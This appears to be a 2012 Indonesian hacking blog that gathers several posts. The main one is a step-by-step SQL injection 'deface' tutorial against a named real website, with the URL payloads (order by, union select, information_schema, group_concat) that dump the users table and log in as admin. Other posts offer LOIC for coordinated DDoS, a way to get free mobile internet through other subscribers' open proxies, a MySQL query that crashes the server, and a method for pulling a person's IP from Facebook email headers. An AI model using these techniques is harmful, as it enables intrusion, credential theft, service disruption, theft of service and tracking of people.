Free VPN

Kamis, 10 Mei 2012
nah..sekarang we mau share VPN (GRATIS)
-HOTSPOT SHIELD
hotspot shield ini memiliki kelebihan dan kelemahan
kelebihannya bisa menggganti IP addres kita secara maksimal
kekurangannya menurut saya menurunkan sedikit koneksi anda

kalau mau mencoba silahkan download disini :
DOWNLOAD HOTSPOT SHIELD

Low Orbit Ion Cannon

nah..sekarang saya mau share sebuah aplikasi untuk mendukung kita melakukan kegiatan Denial of Service atau biasa dikenal dengan ddos..
cara menggunakannya pun sangat mudah tinggal kita masukin IP target dan lock on..ada baiknya kita melakukannya secara bersamaan..

langsung aja disedot masbro

Setting Modem HSDPA

Kamis, 03 Mei 2012

Pernah tidak anda mengalami problem bahwa meskipun sudah berada di area sinyal 3G/HSDPA/WCDMA, terkadang Modem yang digunakan masih saja mendapatkan sinyal yang selalu tidak stabil, dalam hal ini terkadang yang tadinya koneksi modem sudah mendapatkan sinyal 3G atau HSDPA, lama kelamaan menurun atau berubah menjadi sinyal EDGE saja.

Hal ini sebenarnya terjadi dikarenakan modem yang digunakan sifatnya hanya mencari sinyal yang paling kuat saja, jadi kalau modem anda merasa sinyal 3G yang diterima lebih sedikit ketimbang sinyal EDGE, maka sinyal EDGE lah dipilihnya. Tidak mengenai anda mau menggunakan layanan Broadband Internet Unlimited Indosat, Telkomsel Flash Unlimited, XL Unlimited, Internet Unlimited Smart, AXIS Internet Unlimited ataupun layanan lainnya tetap sama saja.

Sebagai perbandingan, Koneksi Internet akan lebih cepat meskipun anda memperoleh setengah sinyal 3G/HSDPA/WCDMA ketimbang memperoleh sinyal Full EDGE. Nah untuk mengatasi masalah tersebut, hal yang perlu di lakukan ialah memaksa sedikit modem agar mengabaikan sinyal EDGE dan terus mengambil sinyal 3G/HSDPA/WCDMA. Caranya pun sangat simple yaitu:

1. Pada aplikasi modem, Klik menu Tools lalu pilih Options

2. Pada halaman Form Options, Pilih Network

3. Ubah pada bagian Network Type menjadi 3G only atau HSDPA only atu WCDMA only lalu klik tombol OK untuk menyimpan. “Untuk pilihan setting ini tergantung dari ketersediaan modem yang anda gunakan. Sebagai contoh untuk modem saya yaitu di set ke WCDMA only”.

Keterangan:
Setting pada modem diatas mungkin saja berbeda dengan setting modem lain. jadi silahkan sesuaikan saja cara setting tergantung dari jenis modem masing-masing.

Setelah mengubah setting seperti diatas, coba lihat perbedaan sinyal dari sebelumnya. Kalau saya sendiri sekarang selalu mendapatkan sinyal HSDPA atau kalau tidak WCDMA dan tidak pernah lagi berubah menjadi EDGE ataupun lebih rendah.

Ok semoga dengan tutorial cara melakukan setting agar modem tetap bisa mendapatkan sinyal 3G, HSDPA atau WCDMA ini bisa bermanfaat dan semoga pula bisa menjawab pertanyaan dari komentar pengunjung blog ini di Cara Setting APN Three (3) Internet Unlimited (GPRS/3G/HSDPA).

Trik Internetan gratis ( Telkom Flash )


Dasar dari trik internet gratis ini adalah mencari IP Adress dan Port yang terbuka pada jaringan
Telkomsel Flash.
Ketika kita terkoneksi dengan jaringan telkomsel flash, masing-masing kita diberikan IP address unik.
Karena yang menggunakan layanan telkomsel flash ini ribuan bahkan jutaan orang, kita bisa
memanfaatkan IP adress
orang lain untuk bisa connect internet, dan karena kita hanya “numpang” maka tidak kena biaya alias
GRATIS !!!
Langkah-langkahnya :
- Konek jaringan telkomsel flash dengan
APN : FLASH
UserName : (biarkan kosong)
Password : (biarkan kosong)
- Selanjutnya proses scan jaringan untuk mencari IP adress dan port yang bisa “ditumpangi”.
Kita bisa saja scan manual dengan command prompt(CMD) pada windows tapi lama boss.
Agar lebih mudah, kita bisa menggunakan berbagai macam software untuk scan jaringan.
Software yang aku gunakan adalah Ipscan-3.0 (membutuhkan JavaRuntimeEnvironment/JRE 5 keatas). Kamu dapat download disini.
Kamu juga bisa cari software ini melalui google atau rapidshare.
- Kalo sdh dapat Ip Adress dan port yang terbuka, ganti network setting browser kamu dengan
IP dan Port yang kamu dapat tadi.
cara gantinya :
Firefox : tool>>option>>advanced>>network>>setting
Internet Explorer : tool>>internet option>>connections>>LAN setting
Opera : cari tau sendiri !! hahahaha
Ada cara mudah mengganti setting browser, kita bisa menggunakan software proxy switcher.
Kamu bisa cari software ini di google.

Smiley chat Facebook

Copy lalu paste seluruh code dibawah ini kedalam box chat di Facebookuntuk mendapatkan gambar yang diinginkan..

1.Mask

[[255006724575192]] [[255006727908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]

2. Jack Sparrow

[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

3. Superman

[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

4. Elmo

[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]

5. Troll face

[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]

6. Mr. Bean

[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]

big pink panther
[[378559652167731]] [[378559662167730]] [[378559655501064]] [[378559648834398]] [[378559658834397]] [[378559768834386]]
[[378559772167719]] [[378559778834385]] [[378559775501052]] [[378559782167718]] [[378559865501043]] [[378559875501042]]
[[378559868834376]] [[378559872167709]] [[378559878834375]] [[378559942167702]] [[378559945501035]] [[378559948834368]]
[[378559955501034]] [[378559952167701]] [[378560068834356]] [[378560072167689]] [[378560075501022]] [[378560065501023]]
[[378560078834355]] [[378560162167680]] [[378560168834346]] [[378560155501014]] [[378560165501013]] [[378560158834347]]

laugh

[[190350121060720]] [[190350151060717]] [[190350224394043]] [[190350264394039]] [[190350274394038]] [[190350321060700]] [[190350337727365]]
[[190350524394013]] [[190350544394011]] [[190350651060667]] [[190350811060651]] [[190350824393983]] [[190350837727315]] [[190350851060647]]
[[190351834393882]] [[190351844393881]] [[190354824393583]] [[190354847726914]] [[190354857726913]] [[190356574393408]]
[[190357747726624]] [[190357764393289]] [[190357774393288]] [[190359411059791]] [[190359441059788]] [[190359467726452]]
[[190365544392511]] [[190368041058928]] [[190368054392260]] [[190368067725592]] [[190370207725378]] [[190370234392042]]
[[190370834391982]] [[190370844391981]] [[190373951058337]] [[190373964391669]] [[190373981058334]] [[190373987725000]]
[[190374151058317]] [[190374177724981]] [[190374184391647]] [[190374207724978]] [[190374234391642]] [[190374251058307]]
[[190374704391595]] [[190374731058259]] [[190374761058256]] [[190374781058254]] [[190374787724920]] [[190374814391584]]

i dont noe any thin

[[205976099504207]] [[205976089504208]] [[205976102837540]] [[205976092837541]] [[205976096170874]] [[205976202837530]]
[[205976196170864]] [[205976206170863]] [[205976199504197]] [[205976192837531]] [[205976279504189]] [[205976276170856]]
[[205976286170855]] [[205976272837523]] [[205976282837522]] [[205976362837514]] [[205976359504181]] [[205976352837515]]
[[205976356170848]] [[205976349504182]] [[205976466170837]] [[205976469504170]] [[205976462837504]] [[205976476170836]]
[[205976472837503]] [[205976572837493]] [[205976569504160]] [[205976566170827]] [[205976576170826]] [[205976579504159]]

devil
[[296138700436300]] [[296138730436297]] [[296138763769627]] [[296138793769624]] [[296138813769622]]
[[296138853769618]] [[296138873769616]] [[296138920436278]] [[296138960436274]] [[296138980436272]]
[[296139003769603]] [[296139023769601]] [[296139047102932]] [[296139080436262]] [[296139110436259]]
[[296139140436256]] [[296139157102921]] [[296139190436251]] [[296139233769580]] [[296139257102911]]
[[296139287102908]] [[296139310436239]] [[296139327102904]] [[296139360436234]] [[296139390436231]]

jackie chan

[[323235574399378]] [[323235564399379]] [[323235577732711]] [[323235571066045]] [[323235567732712]] [[323235704399365]] [[323235707732698]] [[323235717732697]]
[[323235711066031]] [[323235714399364]] [[323235824399353]] [[323235817732687]] [[323235827732686]] [[323235814399354]] [[323235821066020]] [[323235927732676]]
[[323235934399342]] [[323235931066009]] [[323235924399343]] [[323235937732675]] [[323236091065993]] [[323236094399326]] [[323236087732660]] [[323236097732659]]
[[323236101065992]] [[323236207732648]] [[323236201065982]] [[323236204399315]] [[323236197732649]] [[323236211065981]] [[323236324399303]] [[323236321065970]]

smiley :P

[[299559310104599]] [[299559316771265]] [[299559313437932]] [[299559306771266]] [[299559303437933]]
[[299559430104587]] [[299559433437920]] [[299559440104586]] [[299559443437919]] [[299559436771253]]
[[299559523437911]] [[299559526771244]] [[299559530104577]] [[299559520104578]] [[299559533437910]]
[[299559590104571]] [[299559596771237]] [[299559586771238]] [[299559593437904]] [[299559600104570]]
[[299559806771216]] [[299559796771217]] [[299559810104549]] [[299559800104550]] [[299559803437883]]
[[299559916771205]] [[299559910104539]] [[299559906771206]] [[299559903437873]] [[299559913437872]]

caT

[[358384527518988]] [[358384530852321]] [[358384534185654]] [[358384524185655]] [[358384537518987]] [[358384610852313]] [[358384620852312]]
[[358384614185646]] [[358384627518978]] [[358384624185645]] [[358384707518970]] [[358384710852303]] [[358384700852304]] [[358384704185637]]
[[358384714185636]] [[358384804185627]] [[358384794185628]] [[358384790852295]] [[358384797518961]] [[358384800852294]] [[358384937518947]]
[[358384934185614]] [[358384940852280]] [[358384930852281]] [[358384927518948]] [[358385020852272]] [[358385027518938]] [[358385017518939]]
[[358385030852271]] [[358385024185605]] [[358385114185596]] [[358385110852263]] [[358385100852264]] [[358385107518930]] [[358385097518931]]

SMILEY OF DEAD

[[213144808783633]] [[213144805450300]] [[213144798783634]] [[213144802116967]] [[213144795450301]]
[[213144898783624]] [[213144895450291]] [[213144892116958]] [[213144888783625]] [[213144902116957]]
[[213144952116952]] [[213144955450285]] [[213144948783619]] [[213144942116953]] [[213144945450286]]
[[213145008783613]] [[213145012116946]] [[213145002116947]] [[213144998783614]] [[213145005450280]]
[[213145098783604]] [[213145108783603]] [[213145102116937]] [[213145105450270]] [[213145095450271]]

fcb

[[183138021788015]] [[183138031788014]] [[183138028454681]] [[183138035121347]] [[183138025121348]]
[[183138125121338]] [[183138115121339]] [[183138118454672]] [[183138121788005]] [[183138128454671]]
[[183138171788000]] [[183138178454666]] [[183138181787999]] [[183138175121333]] [[183138185121332]]
[[183138231787994]] [[183138228454661]] [[183138238454660]] [[183138235121327]] [[183138241787993]]
[[183138321787985]] [[183138325121318]] [[183138331787984]] [[183138318454652]] [[183138328454651]]

perry platypus

[[205571709540203]] [[205571716206869]] [[205571719540202]] [[205571712873536]]
[[205571722873535]] [[205571822873525]] [[205571832873524]] [[205571826206858]]
[[205571829540191]] [[205571819540192]] [[205571889540185]] [[205571886206852]]
[[205571899540184]] [[205571892873518]] [[205571896206851]] [[205571939540180]]
[[205571949540179]] [[205571942873513]] [[205571952873512]] [[205571946206846]]
[[205572042873503]] [[205572046206836]] [[205572039540170]] [[205572036206837]]

lol

[[307295845975253]] [[307295885975249]] [[307295925975245]] [[307295955975242]]
[[307295969308574]] [[307295975975240]] [[307295999308571]] [[307296002641904]]
[[307296019308569]] [[307296035975234]] [[307296042641900]] [[307296055975232]]
[[307296069308564]] [[307296082641896]] [[307296119308559]] [[307296129308558]]




http://faisal-dae.blogspot.com/2012/02/code-emo-chat-obrolan-fb-terbaru_24.html

SQLi Step by Step (deface)

Rabu, 02 Mei 2012
[1]
 Mencari target,,
untuk mencari target kalian dapat memakai google dorks untuk SQLi
contoh : http://www.pantirapih.or.id/baru09/k...d.php?id=47766

[2]
 Setelah menemukan target , langkah berikutnya adalah mengecek apakah target dapat di inject atau tidak.
cara mengecek dengan menambahkan karakter * atau - pada akhir alamat url.
contoh : http://www.pantirapih.or.id/baru09/k...d.php?id=47766*
http://www.pantirapih.or.id/baru09/k....php?id=47766-

jika ditemukan error seperti
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/u198/domain/pantirapih.or.id/web/baru09/konsultasi_read.php on line 13

maka target tersebut vuln / dapat di inject.

[3]
 mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
http://www.pantirapih.or.id/baru09/k...6+order+by+1--

sekarang cek secara satu per satu
contoh:
http://www.pantirapih.or.id/baru09/k...6+order+by+1--
http://www.pantirapih.or.id/baru09/k...6+order+by+2--
hingga
http://www.pantirapih.or.id/baru09/k...+order+by+12--
http://www.pantirapih.or.id/baru09/k...+order+by+13--

sehingga muncul error atau hilang pesan error...
misal:
http://www.pantirapih.or.id/baru09/k...+order+by+13--

berarti yang kita ambil adalah sampai angka 12


[4]
 untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 13
gunakan perintah : +and+1=2+union+select+
maka:
http://www.pantirapih.or.id/baru09/k...8,9,10,11,12--

maka akan muncul angka 4 ,7 , 8
gunakan perintah version() untuk mengecek versi sql yg dipakai , user() untuk mengetahui nama user, database() untuk mengetahui nama database ,masukan perintah tsb pada angka yg keluar tadi
contoh:
http://www.pantirapih.or.id/baru09/k...),9,10,11,12--

lihat versi yg digunakan, jika versi 4.x.x.xx tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah +from+information_schema
untuk versi 5.x.x.xx berarti anda beruntung tidak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah +from+information_schema

[5]
 Untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi dan
perintah +from+information_schema.tables+where+table_schema =database()-- -> dimasukan setelah angka terakhir

contoh:
http://www.pantirapih.or.id/baru09/k...a=database()--


cari table dengan nama seperti

user, usr, username, user_name, login, user_admin, name, admin_user, dll

di dalam tersebut biasanya tersimpan username dan password.

dalam contoh ini adalah users

ubah dulu kata users ke dalam hexa memakai tool ini ASCII to HEX

hasilnya adalah 75 73 65 72 73 ,hilangkan spasinya menjadi 7573657273

[6]
Mencari isi table

Perintah : group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah : +from+information_schema.columns+where+table_name= 0xhexa--

-> dimasukan setelah angka terakhir

ganti hexa dengan kata users yg sudah di convert ke hexa



contoh :

http://www.pantirapih.or.id/baru09/k...0x7573657273--

maka isi dari table users adalah

id,login,password

[7]
 Melihat isi dari column id , login password.
gunakan perintah : group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
contoh : http://www.pantirapih.or.id/baru09/k...2+from+users--
0x3a adalah tanda : (titik dua )
[8]
 Langkah terakhir adalah mencari halaman login admin dan masukkan username beserta password yang anda dapatkan

Memahami Serangan Denial of Service

Selasa, 01 Mei 2012

Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.
Apa itu DoS
Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.
Secara umum ada 2 cara melakukan serangan DoS:
  1. Mematikan Server
  2. Menyibukkan Server
    • Tanpa bug/vulnerability
    • Meng-exploit bug/vulnerability
DoS dengan Mematikan Server: Kill Them!
Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.
Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.
Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.
Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:
  • Ping of Death ( CA-1996-26 )
  • Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
  • MySQL IF Query DoS ( SA25188 )
  • Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.
  • Cisco Global Site Selector DNS Request Denial of Service (SA33429)
  • Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.
Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.
DoS dengan Menyibukkan Server: Make Them As Busy As Possible!
Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.
Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.
DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:
  • Exploiting vulnerability: Menyerang dengan malicious request/packet
  • No vulnerability exploitation: Menyerang dengan normal request/packet
Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.
Make Server Busy by Exploiting Vulnerability
Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.
Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.
Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:
  • TCP SYN Flood DoS
  • Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.
    Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
  • Apache mod_deflate DoS
  • Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.
    Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.
Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.
Make Server Busy Without Exploiting Vulnerability
Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.
Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).
Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.



Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).
Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.
Kesimpulan
Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:
  • Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
  • Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
    • Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
    • Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

Melacak ip address via facebook chat



Bagaimana cara melacak IP Address seseorang di Facebook? Identitas palsu (fake-ID) di facebook sering dipakai untuk teror, pornografi, bahkan berpolitik. Sangat meresahkan. Persoalannya,, bagaimana “melacak” keberadaan orang yang identitasnya mencurigakan? Saya ingin sampaikan solusinya.


Logika


Terdapat pengaturan  untuk setiap account facebook untuk notifikasi lewat email. Sehingga, anda dapat mengatur agar ada pemberitahuan lewat email jika ada seseorang mengirimkan pesan ke “inbox” (kotak masuk) facebook. Anda bisa aktifkan “header” email (misalnya di Yahoo) agar bisa menampilkan informasi IP Address “seseorang” tadi. Mengingat informasi IP Address itu masih dalam bentuk encode “Base64? Anda tinggal mengubahnya agar menjadi format IP Address (angka). Setelah ketemu,, lihatlah waktu pengirimannya dan cari lokasi IP Address itu. Selanjutnya,, terserah Anda.


Tutorial


Singkatnya,, inilah tutorial yang bisa Anda jalankan:


Buka account email Anda (misalnya Yahoo!) dan aktifkan pengaturan untuk menayangkan header email,, jadi kalau ada email masuk akan ditampilkan rute pengiriman email secara lengkap. Silakan baca manual penggunaan email.
Aktifkan notifikasi di facebook agar facebook mengirimkan pemberitahuan melalui email.
Cari target yang Anda curigai,, orang yang Anda anggap menggunakan identitas palsu. Atau apa saja motifnya terserah Anda (sebab saya tidak berurusan dengan motif Anda).
Kirimkan pesan kepada target yang Anda curigai tadi,, lakukan rekayasa agar dia memberikan jawaban melalui message!
Setelah dia membalas pesan,, bukalah email Anda. Di situ ada pemberitahuan dari facebook.
Subject:
“<Facebook user> sent you a message on Facebook…”, or “<Facebook user> commented on a photo of you on Facebook…”
X-Facebook: from xxxxyyzz ([OTcuODMuMjEuMjM=]) by www.facebook.com with HTTP (xxxxMail);
Teks OTcuODMuMjEuMjM= merupakan encode Base64 yang harus Anda convert menjadi plain text (teks biasa). Inilah IP Address dari target yang Anda curigai!
Convert teks “OTcuODMuMjEuMjM=” dengan converter Base64 (cari di Google!) atau gunakan service online (layanan online) yang bertebaran di internet. Catat IP Address yang menjadi target Anda!
Gunakan pelacak IP Address yang bisa menginformasikan lokasi geografis dari sebuah ip Address.
Selanjutnya,, terserah Anda.


Catatan


Jangan menghapus pesan dari “seseorang” yang ingin Anda “balas”. Facebook merancang Kotak Pesan sebagai “percakapan” (conversation). Itu merupakan arsip yang bisa diandalkan untuk meng-kasus seseorang. Jangan matikan notifikasi di account Facebook Anda jika ingin mendapatkan bukti otentik. Kalau Anda sudah memiliki catatan notifikasi dan email dari facebook,, dengan mudah Anda bisa menghajar siapapun yang ingin menteror Anda. Walaupun Anda menyembunyikan email dari informasi profile, memakai bukan-nama-sebenarnya, ataupun informasi palsu,, ingatlah: logika tetaplah logika!!!


Banyak yang merasa aman melakukan teror dari warnet, tetapi, warnet justru paling tidak aman. Banyak “saksi” di sana, aktivitas Anda bisa dimonitor (sebab Anda di ruang publik). Banyak juga yang merasa aman memakai internet pribadi,, lewat ponsel,, dll. ingatlah bahwa account Anda terdaftar ! Melacaknya hanya soal waktu.


Postscript


